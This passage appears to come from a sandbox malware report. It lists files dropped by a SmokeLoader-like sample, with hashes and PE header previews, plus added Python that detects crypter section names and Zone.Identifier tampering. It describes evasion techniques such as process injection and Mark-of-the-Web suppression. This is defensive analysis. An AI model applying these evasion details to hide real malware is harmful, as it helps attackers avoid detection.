                                                                                                                                                                                                        Preview: KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LFU3OHDJ
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):118784
                                                                                                                                                                                                        Entropy (8bit):0.4507667042986948
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:V/WU+bDoYysX0uhnydVjN9DLjGQLBE3u:V/l+bDo3irhnydVj3XBBE3u
                                                                                                                                                                                                        MD5:8D1E4EF2C47505BE17244F97D8591000
                                                                                                                                                                                                        SHA1:09EC63BD44834AC76F888D87C0A358532665D8B6
                                                                                                                                                                                                        SHA-256:A395EB3FFB419984F33F2AC9EE04A6257730A4600580812A5518957F50BB6D88
                                                                                                                                                                                                        SHA-512:B7EB3FE94FF62DD8D6BFEF55C0D79ABB2DAC65E30757E016B37CF78F29C27BDE89D0798CD21357B438EE4007D917AD830A11521DA3DC5C1988D73CBD9990FCD1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OHVS0ZUA
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PALRGUCVEH.docx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PALRGUCVEH.xlsx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sdiimdop.exe
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\18D.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14973440
                                                                                                                                                                                                        Entropy (8bit):4.645907802057032
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:+AH3plu5xWDwtTwKc6+9YwoTPxSeI2co8mfgWddddddddddddddddddddddddddt:+AH3pCxvTS6Wh6PIeI/
                                                                                                                                                                                                        MD5:F548B3529CA470C25E50AF6220AD3098
                                                                                                                                                                                                        SHA1:A241FBA1FD229664849616D3425AC80DA447583B
                                                                                                                                                                                                        SHA-256:B9029679671D745FEE6E41A455E8DAAC8D64FC9DA159416596D02736A544D4AB
                                                                                                                                                                                                        SHA-512:1E6C0914678E07D1DBCA262F57D88ED54E35E6B15AC4E5ADFE74EBB001D323BB45CEA47F1CCB9995BC65B02C00CEAE5ACE2AE3AF590829050963514351AA5CA7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L...15.`.................>...........+.......P....@.................................*(......................................<;..(.......`....................P..,#..`............................... ...@............................................text...n<.......>.................. ..`.data...H%...P.......B..............@....lave................X..............@....fidoce.K............Z..............@....pihudu..............\..............@....lafog...............^..............@....rsrc...`............l..............@..@.reloc...>...P......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\haifbcd
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 343040
Entropy (8bit): 6.634640145792183
Encrypted: false
SSDEEP: 6144:5lA3X2bDueST6gKO1tqT7b4YlCTFGbGQ273pQGfT:5lA3X22e0VKYY70A4FOGQKt
MD5: DC67C627917FF9724F3C1E6DB5F2DC27
SHA1: 4B7528999AD6095B3FBB3AEC059EFB88D999EA95
SHA-256: 26A4C5B36D9FDE80EA47137EB53B40DACF240432A5895F98417EAE51B6B681DA
SHA-512: 977AAB0AC60948315435E0698058598F40F42D7830B87EE7668BB209938CB388AA5B07C13B66C56DB1AFFA6F86A859B3C01666A22E437C808B6C9DB38975C7B0
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L....(._.................@...................P....@.........................................................................l=..(.......`....................P..8#..`............................... ...@............................................text....>.......@.................. ..`.data...H%...P.......D..............@....bekuvox.............Z..............@....jutu...K............\..............@....vezev...............^..............@....mubone..............`..............@....rsrc...`............n..............@..@.reloc...>...P...@..................@..B........................................................................................................................................................................................................................
Note: MD5, SHA1 and SHA-256 of this file are identical to those of the submitted sample nkINykHreE.exe, so it is a byte-for-byte copy of the original placed in the Roaming profile under a random seven-letter name, and the writer is explorer.exe rather than the sample itself, which fits the process-injection signatures listed for this run. The section table in the preview (.lave, .fidoce, .pihudu, .lafog between the usual .text/.data and .rsrc/.reloc) shows the randomised section names of the crypter.
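The previews of the two dropped PEs show section tables padded with invented names (.lave, .fidoce, .pihudu, .lafog here; .pamicak, .dos, .modav, .nugirof in scifbcd below) between the compiler's .text/.data and .rsrc/.reloc, which is a fingerprint of the crypter rather than of any toolchain. The following Python is an added illustration and is not part of the Joe Sandbox report: it parses a PE section table from the raw headers and flags non-standard names and writable+executable sections. The image it parses is a constructed header-only PE32 whose section order and names mirror the haifbcd preview; sizes, flags, the clean comparison layout and the UPX-style layout are assumptions, not data from the real file.

```python
import struct

# Section names that common toolchains emit (lower-case); anything else is suspect.
STANDARD_SECTIONS = {
    ".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc",
    ".tls", ".pdata", ".xdata", ".crt", ".debug", ".ndata", ".gfids", ".00cfg",
    ".didat", ".textbss", "code", "data", "bss", "idata", "edata", "rsrc", "reloc",
}

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

_CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
_RWDATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
_RODATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ

# Constructed layouts (name, characteristics). SMOKELOADER_LIKE copies the names and
# order visible in the haifbcd preview; the flags are assumed.
SMOKELOADER_LIKE = [(".text", _CODE), (".data", _RWDATA), (".lave", _RWDATA), (".fidoce", _RWDATA),
                    (".pihudu", _RWDATA), (".lafog", _RWDATA), (".rsrc", _RODATA),
                    (".reloc", _RODATA | IMAGE_SCN_MEM_DISCARDABLE)]
CLEAN_LAYOUT = [(".text", _CODE), (".rdata", _RODATA), (".data", _RWDATA), (".rsrc", _RODATA),
                (".reloc", _RODATA | IMAGE_SCN_MEM_DISCARDABLE)]
UPX_LIKE = [("UPX0", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
            ("UPX1", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
            (".rsrc", _RWDATA)]


def build_pe32_header(layout):
    """Constructed header-only PE32 image (DOS stub, PE signature, COFF + optional header, section table)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)                    # e_lfanew -> PE signature
    opt_size = 0xE0                                                 # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x014C, len(layout), 0, 0, 0, opt_size, 0x0102)  # i386, EXECUTABLE|32BIT
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(layout))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_sections(image):
    """Walk MZ -> e_lfanew -> COFF header -> section table and return one dict per section."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _machine, count, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size                            # section table follows the optional header
    sections = []
    for i in range(count):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "virtual_size": vsize,
                         "virtual_address": vaddr, "raw_size": rawsize, "raw_pointer": rawptr,
                         "characteristics": flags})
    return sections


def _is_wx(section):
    return bool(section["characteristics"] & IMAGE_SCN_MEM_WRITE
                and section["characteristics"] & IMAGE_SCN_MEM_EXECUTE)


def section_findings(sections):
    """Human-readable findings: invented section names and writable+executable sections."""
    findings = []
    for s in sections:
        if s["name"].lower() not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {s['name']!r}")
        if _is_wx(s):
            findings.append(f"section {s['name']!r} is writable and executable (unpack-in-place)")
    return findings


def looks_packed(sections, odd_name_threshold=3):
    """Heuristic: several invented names (crypter padding) or any W+X section (classic packer)."""
    odd = sum(1 for s in sections if s["name"].lower() not in STANDARD_SECTIONS)
    return odd >= odd_name_threshold or any(_is_wx(s) for s in sections)


if __name__ == "__main__":
    for label, layout in (("smokeloader-like", SMOKELOADER_LIKE), ("clean", CLEAN_LAYOUT), ("upx-like", UPX_LIKE)):
        secs = parse_sections(build_pe32_header(layout))
        print(label, [s["name"] for s in secs], "packed:", looks_packed(secs), section_findings(secs))
```

The name heuristic alone misses UPX-style packers, whose two sections are few but writable and executable, which is why `looks_packed` also checks characteristics; on a real file, run `parse_sections` on the first few kilobytes read from disk.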
C:\Users\user\AppData\Roaming\haifbcd:Zone.Identifier
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: unknown
Preview: [ZoneTransfer]....ZoneId=0
Note: this is the Zone.Identifier alternate data stream of the haifbcd copy above. ZoneId=0 is the Local Machine zone, so the copy carries no Mark-of-the-Web; the "Hides that the sample has been downloaded from the Internet (zone.identifier)" signature in the overview refers to this stream.
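A Zone.Identifier stream with ZoneId=0 puts the file in the Local Machine zone, so SmartScreen and every "this file came from the Internet" check that keys off ZoneId=3 stays silent for the dropped copy. The Python below is an added example and not content of the report: it splits the ADS name from the file path, parses the stream, classifies the zone, and checks a reconstruction of the dropped stream against the size and 8-bit entropy listed above. The exact byte layout of that 26-byte stream is an assumption (the preview only shows two runs of non-printable bytes), as is the Internet-zone sample with its example.invalid URLs.

```python
import math
from collections import Counter
from typing import Optional, Tuple

# URLMON security zones as they appear in a Zone.Identifier stream.
ZONES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites", 3: "Internet", 4: "Restricted Sites"}

# Reconstruction (assumed layout) of the stream previewed as "[ZoneTransfer]....ZoneId=0";
# the placement of the two CRLFs is not visible, but this layout reproduces the
# reported size (26) and byte histogram, hence the reported entropy.
DROPPED_ZONE_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"

# Constructed: what a browser download normally carries (URLs are placeholders).
INTERNET_ZONE_STREAM = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                        b"ReferrerUrl=https://example.invalid/\r\n"
                        b"HostUrl=https://example.invalid/nkINykHreE.exe\r\n")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the figure the report lists as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def split_stream_path(path: str) -> Tuple[str, Optional[str]]:
    """Split 'file:stream' into (file, stream); the drive-letter colon is not a stream separator."""
    head, sep, tail = path.rpartition(":")
    if not sep or not head or "\\" in tail or "/" in tail:
        return path, None
    return head, tail


def parse_zone_identifier(data: bytes) -> dict:
    """Parse the INI-style [ZoneTransfer] section; returns {} when no usable ZoneId is present."""
    fields, section = {}, None
    for raw in data.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    try:
        zone_id = int(fields["zoneid"])
    except (KeyError, ValueError):
        return {}
    return {"zone_id": zone_id, "zone": ZONES.get(zone_id, "unknown"),
            "host_url": fields.get("hosturl"), "referrer_url": fields.get("referrerurl")}


def motw_finding(path: str, stream: Optional[bytes]) -> str:
    """One-line triage verdict for a file and its Zone.Identifier stream (None = no such stream)."""
    file_path, stream_name = split_stream_path(path)
    if stream_name and stream_name.lower() != "zone.identifier":
        return f"{file_path}: other ADS '{stream_name}', not a Mark-of-the-Web"
    if stream is None:
        return f"{file_path}: no Zone.Identifier stream (never marked, or the mark was removed)"
    info = parse_zone_identifier(stream)
    if not info:
        return f"{file_path}: Zone.Identifier present but carries no ZoneId"
    if info["zone_id"] <= 2:
        return (f"{file_path}: ZoneId={info['zone_id']} ({info['zone']}); content fetched from the network "
                f"should carry ZoneId=3, so this looks like deliberate MOTW suppression")
    return f"{file_path}: ZoneId={info['zone_id']} ({info['zone']}), host={info['host_url']}"


def matches_report(data: bytes, size: int, entropy: float, tol: float = 1e-8) -> bool:
    """Check a reconstructed stream against the size and entropy the report lists for it."""
    return len(data) == size and abs(shannon_entropy(data) - entropy) < tol


if __name__ == "__main__":
    print(matches_report(DROPPED_ZONE_STREAM, 26, 3.95006375643621))
    print(motw_finding(r"C:\Users\user\AppData\Roaming\haifbcd:Zone.Identifier", DROPPED_ZONE_STREAM))
    print(motw_finding(r"C:\Users\user\Downloads\nkINykHreE.exe", INTERNET_ZONE_STREAM))
```

On a live Windows host the stream content comes from `Get-Content -Path <file> -Stream Zone.Identifier`; a copy that has the stream with ZoneId=0, written by a process that is not a browser or archiver, is the signal to hunt for.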
C:\Users\user\AppData\Roaming\scifbcd
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 358912
Entropy (8bit): 6.278717191933335
Encrypted: false
SSDEEP: 6144:7e+RhbrOOFh9v2Y8zBk3L3gXO1RdFggj:7e6aOFhB8zBk3L3b1R
MD5: 1F935BFFF0F8128972BC69625E5B2A6C
SHA1: 18DB55C519BBE14311662A06FAEECC97566E2AFD
SHA-256: 2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D
SHA-512: 2C94C1EA43B008CE164D7CD22A2D0FF3B60A623017007A2F361BDFF69ED72E97B0CC0897590BE9CC56333E014CD003786741EB6BB7887590CB2AAD832EA8A32D
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..S/.../.../...1.Z.=...1.L.W....6..*.../.......1.K.....1.[.....1.^.....Rich/...................PE..L...t..`.................<...J.......4.......P....@.................................A.......................................,9..<....0...Y.......................#..P...............................X...@............................................text...4:.......<.................. ..`.data...`....P.......@..............@....pamicak............................@....dos....K...........................@....modav..............................@....nugirof..... ......................@....rsrc....Y...0...Z..................@..@.reloc...>.......@...:..............@..B................................................................................................................................................................................................................
Note: a second executable of the same construction as haifbcd (same writer, same random-name scheme in the Roaming profile, its own set of invented section names .pamicak, .dos, .modav, .nugirof) but with a different hash, i.e. not a copy of the submitted sample.

C:\Users\user\AppData\Roaming\wratetu
Process: C:\Windows\explorer.exe
File Type: data
Category: dropped
Size (bytes): 248375
Entropy (8bit): 7.99937643116622
Encrypted: true
SSDEEP: 6144:IkACiiHYkyeqaRSZryvUV2l1UQpP3lNfoY6TA:4C1YkGaUFoSAR
MD5: 5CFC7301CEC69F9AA0EDF70A574D4436
SHA1: F739E265A1CE0AE4F83E408CC9F52878541B3718
SHA-256: B4F15FCE9A5739BC29C5F2A9A22ADC707EA244763D4D4E79199202C8180A33CC
SHA-512: 26A6FF5587FA2CDAA9381728AE8E91D45F5A45D51431CC9710D625C4330723E802FA8393619CCABE8303B6C1F046FE3F91C8F68CEF37680BDD1E56ECD14A5721
Malicious: false
Reputation: unknown
Preview: ..{P..8......{.....l.(aU..-...K@n.$.....R...Z>..V.f.~.N..?i.}............pg*#...4.9~>S...x.T.(c80J9&... >QUT./,O...J...yp.A.R.....|...tf..,A.9-......F...#j...........B..!...#...v..Y.-..e<...r....6.V\..I.w..&..}.2b....x.-.qw.C.8..i..#c46I.......^..D.&@Ye.).U.wK...2{l..s..~...........Ja..1......B....s.[..)<.k.nNn.3Qk...+a..6G.x..5Y.WY....U.{l..}...c........I.....0.}.#, rJ...,dht......6....rw.}.6j`/}.a/5,}..Z.%U.......qa.9.j(c.q.7..o..e.up.`.{.(o.*.....h....O........E..~..........bZ..Y.|.P.;..2..v#.0MV+.P.KW..8.90..l(.~..d.~wP.:..............dz.A...X..\ .5|V.|.if.(.2V7..l{J......M.ey..K..-..I..k ....V..z/mt......Ru..?C../K...;...D.}X...4~y.:=.H....J..`.){s...D.m!-.bv...D....=.....J.o..3..."{.^..7(@.H6........C.IL.#0m;.<9..+s..k....O....:X@|..+IR.g.Ja...L....yJ...xE.o1.P`.......5^U.M....a.(t.rVs.mG..5.A..B..Ar.2Zi..|.^G...p?m...V.s$..~b..........o.. ..r..|zO.y=.h.Y5...jc..ei...0.....T.t.[O.*...$.NX#.T//.NM....x...j..l.......\...3`.$.G.
Note: no recognised file format, an entropy of 7.9994 against a theoretical maximum of 8.0, and no readable structure in the preview: this is what an encrypted or compressed payload or configuration blob looks like. It is dropped next to the two executables by the same explorer.exe process; the absence of a detection on the blob itself says nothing about its contents.
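The three files written by explorer.exe into the Roaming profile (a byte-identical copy of the sample under a random name, a second PE of the same construction, and a near-maximum-entropy blob), together with the cmd.exe drop into C:\Windows\SysWOW64\dbgxuqbr\ further down this list, are the pattern a triage script should pull out of a dropped-files listing automatically. The Python below is an added example, not Joe Sandbox code: it re-encodes those records as dictionaries (values copied from this page, field names ours), compares each hash with the submitted sample's SHA-256 from the report header and applies a small rule set. The thresholds (7.9 bits for "encrypted", 8 MiB and 5.5 bits for "padded") and the list of injectable host processes are our assumptions.

```python
# SHA-256 of the submitted sample nkINykHreE.exe, from the report header.
SAMPLE_SHA256 = "26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da"

# Dropped-file records re-encoded from this page (values copied, field names ours).
DROPPED_FILES = [
    {"path": r"C:\Users\user\AppData\Roaming\haifbcd", "process": r"C:\Windows\explorer.exe",
     "file_type": "PE32 executable (GUI) Intel 80386, for MS Windows", "size": 343040,
     "entropy": 6.634640145792183, "encrypted": False,
     "sha256": "26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da"},
    {"path": r"C:\Users\user\AppData\Roaming\scifbcd", "process": r"C:\Windows\explorer.exe",
     "file_type": "PE32 executable (GUI) Intel 80386, for MS Windows", "size": 358912,
     "entropy": 6.278717191933335, "encrypted": False,
     "sha256": "2bfa0884b172c9eaff7358741c164f571f0565389ab9cf99a8e0b90ae8ad914d"},
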